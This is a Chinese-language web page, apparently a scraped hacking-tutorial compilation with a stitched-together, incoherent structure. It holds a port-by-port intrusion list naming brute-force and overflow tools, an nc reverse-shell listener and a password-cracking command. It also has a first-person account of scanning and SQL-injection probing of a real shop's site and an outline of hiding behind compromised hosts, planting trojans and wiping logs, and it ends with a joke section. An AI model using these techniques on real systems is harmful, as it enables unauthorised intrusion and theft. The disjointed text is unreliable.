利用百度搜索漏洞入侵大量网站(菜鸟入侵网站教程)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破（字典是关键）最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功）sqlhelloz.exe 入侵ip 1433 （这个是正向连接）2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器3. 3899的入侵对很早的机器，可以试试3389的溢出(win3389ex.exe)对2000的机器，可以试试字典暴破。

(tscrack.exe)4. 80入侵对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。

（小榕的注入软件）。

5. serv-u入侵(21端口）对5. 004及以下系统，可用溢出入侵。

（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。

（servlocal.exe）======================================对serv-u的MD5加密密码，可以用字典暴破。

（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。

如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。

7. 6129端口用DameWare6129.exe入侵。

8. 系统漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。

9. 3127等端口可以利用doom病毒开的端口，用nodoom.exe入侵。

朋友是一个哈韩族，老给我推荐一些韩国出产的一些工艺品，呵呵，说真的，老韩的一些工业品还是不错的，特别是服装挺时尚的，俺女朋友就曾经买过两件，哈哈，穿起来挺漂亮的，最近俺朋友又给我推荐了一个卖手表的网站，直接打开如图1所示，手表看起来不错哦，跟劳力士得一拼哦！韩国是美国的小弟，俺是安全爱好者，看到网站就想看看该网站的安全做的如何，当我浏览网站产品时，如果要查看详细情况时，都会自动跳转到登录页面。

如图2所示，仅仅查看而已，都要登录，有这个必要吗？到底它网站的安全性如何呢？一、信息收集1.获取IP 地址首先打开DOS 窗口，然后使用“ping ”获取该网站的真实IP 地址，如图3所示，通过ping 命令知道该主机应该采取了一些安全措施，丢包率比较高，应该是禁止进行ping 等命令。

2.使用superscan 探测端口请出俺的扫描工具——superscan ，使用supersan3.0扫了一下IP 地址为“XX.XX.85.96”的端口开放情况，如图4所示，发现只开了21，22，80端口，从端口开放情况来看，对外提供服务仅仅21和80端口，感觉安全应该还可以，只能从Web 和Ftp 来入手。

3.Ftp口令扫描使用一些Ftp口令扫描工具对该IP地址扫描，使用了多个字典进行扫描，均未成功，看来Ftp口令扫描攻击方法不行。

说明：一般站点都会开放Ftp服务，Ftp服务主要用来上传程序等，一般默认会设置在Web目录，因此一旦获取了Ftp口令，就可以跟用户一样“正常”使用Ftp来上传和下载Web程序，通过上传Webshell或者获取数据库等方式来进行渗透和控制。

二、检查SQL注入攻击点1.寻找注入点先手动对该网站地址进行SQL注入点的检测，在地址后加入“’”、“or”等，例如在地址栏中分别输入：/g oods/content.asp?big=3&middle=12&small=1&num=30967’后回车，在地址栏中会自动变成“/goods/content.asp?big=3&middle=12&small=1&num= 30967%20and%201=1”，如图5所示，虽然手动检测结果提示为SQL错误，当后面使用一些脚本测试，没有找到明显的SQL注入点，使用HDSI等工具进行探测的结果也显示无注入点，说明暂时找不到注入点。

第一步：隐藏自已的位置为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。

所谓“肉鸡”通常是指，HACK实现通过后门程序控制的傀儡主机，通过“肉鸡”开展的扫描及攻击，即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。

第二步：寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。

在Internet上能真正标识主机的是IP地址，域名是为了便于记忆主机的IP地址而另起的名字，只要利用域名和IP地址就可以顺利地找到目标主机。

当然，知道了要攻击目标的位置还是远远不够的，还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。

此时，攻击者们会使用一些扫描器工具，以试图获取目标主机运行的是哪种操作系统的哪个版本，系统有哪些帐户，开启了哪些服务，以及服务程序的版本等资料，为入侵作好充分的准备。

第三步：获取帐号和密码，登录主机攻击者要想入侵一台主机，首先要有该主机的一个帐号和密码，否则连登录都无法进行。

这样常迫使他们先设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，再寻觅合适时机以此身份进入主机。

当然，利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

第四步：获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后，就会做两件事：清除记录和留下后门。

他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序，以便日后可以不被觉察地再次进入系统。

此外，为了避免目标主机发现，清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后，攻击者就开始下一步的行动。

第五步：窃取网络资源和特权攻击者找到攻击目标后，会继续下一步的攻击。

如：下载敏感信息；窃取帐号密码、个人资料等。

三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏，通过扫描，搜集目标主机的相关信息，以期寻找目标主机的漏洞。

常见的扫描工具有X-scan、superscan、流光、X-port等。

教大家怎么黑别人的网站_ 娱乐
黑客教程：如何黑网站；如果攻击别人电脑；如何破解别人密码！！！
一些黑客惯用手段包学包会
特别提醒：百度是黑不了的，不要试。

教程一：如何黑网站
方法一：
第一步：
打开IE5.5以上版本，或FireFox1.5以上版本，并且输入目标网址，打开需要被黑的论坛。

第二步：
取一定浓度黑色墨汁少许，口含，将嘴对准你的屏幕正中，喷！！！
第三步：
抬眼看：黑了！！！它黑了！！！
方法二：
第一步：
打开IE5.5以上版本，或FireFox1.5以上版本，并且输入目标网址，打开需要被黑的论坛。

第二步：
找到显示器开关，伸出食指，将食指对准显示器开关按钮，按！！！
第三步：
抬眼看：黑了！！！它黑了！！!
1
——文章来源网，仅供分享学习参考。